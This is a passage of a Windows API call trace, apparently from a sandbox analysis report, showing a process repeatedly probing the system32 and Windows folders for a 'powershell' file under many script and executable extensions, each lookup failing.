	[0739.755] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0739.755] SetErrorMode (uMode=0x1) returned 0x1
	[0739.755] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0739.763] SetErrorMode (uMode=0x1) returned 0x1
	[0739.765] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0739.765] SetErrorMode (uMode=0x1) returned 0x1
	[0739.765] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.240] SetErrorMode (uMode=0x1) returned 0x1
	[0741.241] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0741.242] SetErrorMode (uMode=0x1) returned 0x1
	[0741.242] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.250] SetErrorMode (uMode=0x1) returned 0x1
	[0741.251] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0741.251] SetErrorMode (uMode=0x1) returned 0x1
	[0741.251] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.267] SetErrorMode (uMode=0x1) returned 0x1
	[0741.269] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0741.269] SetErrorMode (uMode=0x1) returned 0x1
	[0741.270] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0741.278] SetErrorMode (uMode=0x1) returned 0x1
	[0741.279] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0741.280] SetErrorMode (uMode=0x1) returned 0x1
	[0741.280] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0742.594] SetErrorMode (uMode=0x1) returned 0x1
	[0742.595] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0742.595] SetErrorMode (uMode=0x1) returned 0x1
	[0742.596] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0742.604] SetErrorMode (uMode=0x1) returned 0x1
	[0742.605] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0742.615] SetErrorMode (uMode=0x1) returned 0x1
	[0742.615] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.797] SetErrorMode (uMode=0x1) returned 0x1
	[0743.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0743.799] SetErrorMode (uMode=0x1) returned 0x1
	[0743.799] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.799] SetErrorMode (uMode=0x1) returned 0x1
	[0743.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0743.800] SetErrorMode (uMode=0x1) returned 0x1
	[0743.800] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.800] SetErrorMode (uMode=0x1) returned 0x1
	[0743.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0743.800] SetErrorMode (uMode=0x1) returned 0x1
	[0743.801] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.801] SetErrorMode (uMode=0x1) returned 0x1
	[0743.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0743.801] SetErrorMode (uMode=0x1) returned 0x1
	[0743.801] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.802] SetErrorMode (uMode=0x1) returned 0x1
	[0743.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0743.802] SetErrorMode (uMode=0x1) returned 0x1
	[0743.802] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.802] SetErrorMode (uMode=0x1) returned 0x1
	[0743.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0743.803] SetErrorMode (uMode=0x1) returned 0x1
	[0743.803] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.803] SetErrorMode (uMode=0x1) returned 0x1
	[0743.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0743.803] SetErrorMode (uMode=0x1) returned 0x1
	[0743.803] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.804] SetErrorMode (uMode=0x1) returned 0x1
	[0743.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0743.804] SetErrorMode (uMode=0x1) returned 0x1
	[0743.804] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.804] SetErrorMode (uMode=0x1) returned 0x1
	[0743.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0743.805] SetErrorMode (uMode=0x1) returned 0x1
	[0743.805] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.805] SetErrorMode (uMode=0x1) returned 0x1
	[0743.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0743.806] SetErrorMode (uMode=0x1) returned 0x1
	[0743.806] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.806] SetErrorMode (uMode=0x1) returned 0x1
	[0743.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0743.806] SetErrorMode (uMode=0x1) returned 0x1
	[0743.806] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.807] SetErrorMode (uMode=0x1) returned 0x1
	[0743.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0743.807] SetErrorMode (uMode=0x1) returned 0x1
	[0743.807] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.807] SetErrorMode (uMode=0x1) returned 0x1
	[0743.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0743.808] SetErrorMode (uMode=0x1) returned 0x1
	[0743.808] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.808] SetErrorMode (uMode=0x1) returned 0x1
	[0743.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0743.808] SetErrorMode (uMode=0x1) returned 0x1
	[0743.809] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.809] SetErrorMode (uMode=0x1) returned 0x1
	[0743.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0743.809] SetErrorMode (uMode=0x1) returned 0x1
	[0743.809] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.810] SetErrorMode (uMode=0x1) returned 0x1
	[0743.810] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0743.810] SetErrorMode (uMode=0x1) returned 0x1
	[0743.810] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.810] SetErrorMode (uMode=0x1) returned 0x1
	[0743.810] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0743.811] SetErrorMode (uMode=0x1) returned 0x1
	[0743.811] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.811] SetErrorMode (uMode=0x1) returned 0x1
	[0743.811] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0743.811] SetErrorMode (uMode=0x1) returned 0x1
	[0743.811] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.812] SetErrorMode (uMode=0x1) returned 0x1
	[0743.812] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0743.812] SetErrorMode (uMode=0x1) returned 0x1
	[0743.812] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.813] SetErrorMode (uMode=0x1) returned 0x1
	[0743.813] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0743.813] SetErrorMode (uMode=0x1) returned 0x1
	[0743.813] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.813] SetErrorMode (uMode=0x1) returned 0x1
	[0743.813] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0743.814] SetErrorMode (uMode=0x1) returned 0x1
	[0743.814] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c8bdec0 | out: lpFindFileData=0x1c8bdec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0743.814] SetErrorMode (uMode=0x1) returned 0x1
	[0743.814] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bdd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0743.814] SetErrorMode (uMode=0x1) returned 0x1
